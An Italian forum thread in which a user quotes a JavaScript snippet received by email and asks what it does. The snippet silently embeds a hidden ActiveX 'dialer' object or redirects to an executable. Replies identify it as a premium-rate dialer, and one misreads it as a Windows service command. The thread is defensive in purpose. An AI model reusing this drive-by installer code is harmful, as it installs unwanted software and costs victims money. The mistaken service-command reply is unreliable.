Visualizzazione dei risultati da 1 a 4 su 4

Discussione: informazioni su script

  1. #1

    informazioni su script

    mi è arrivata una mail con all'interno questo codice
    codice:
    <script language="JavaScript">
    <!--
    
    var bname=navigator.appName;
    var bver=parseInt(navigator.appVersion);
    function install() {
    if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
    document.write('<object id="dialer" width=1 height=1 classid="CLSID:10A1B95D-5E35-4935-8BC3-D43E81E8105E" codebase="'+exepath+'"></object>');
    } else {
    location.replace(exepath);
    }
    }
    install();
    //-->
    </script>
    qualcuno sa darmi informazioni sull'oggetto che richiama?
    E' la mia opinione ed io la condivido
    Non condivido la tua idea ma darei la vita perché tu la possa esprimere (Voltaire)
    Scrivi sul muro

  2. #2
    Per curiosita' ho fatto una ricerca sul sito della microsoft ed e' uscito questo Link :
    http://msdn.microsoft.com/library/de...p_scm_9f95.asp

    In sostanza dice che il comando "codebase="'+exepath+'" serve per attivare, stoppare, creare o modificare un qualsiasi servizio su 2000 server o NT server

    [-ExePath exe_file_path]

    Specifies the file path to the service executable on the local computer. This option is applicable when you install or modify the service.

    AIAAAAAAAAAAAAAAAA MOLTOOOOOOOOOOOOOOOOOO pericoloso !!!



    Luana
    http://www.interactiveit.info

  3. #3
    e' al 90% un dialer, quel simpatico programmino che ti stacca dalla tua connessione a libero e ti fa chiamare in Africa meridionale a 2500 (euro) al minuto

  4. #4
    grazie per l'interessamento

    vedrò di contattare chi di dovere
    E' la mia opinione ed io la condivido
    Non condivido la tua idea ma darei la vita perché tu la possa esprimere (Voltaire)
    Scrivi sul muro

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.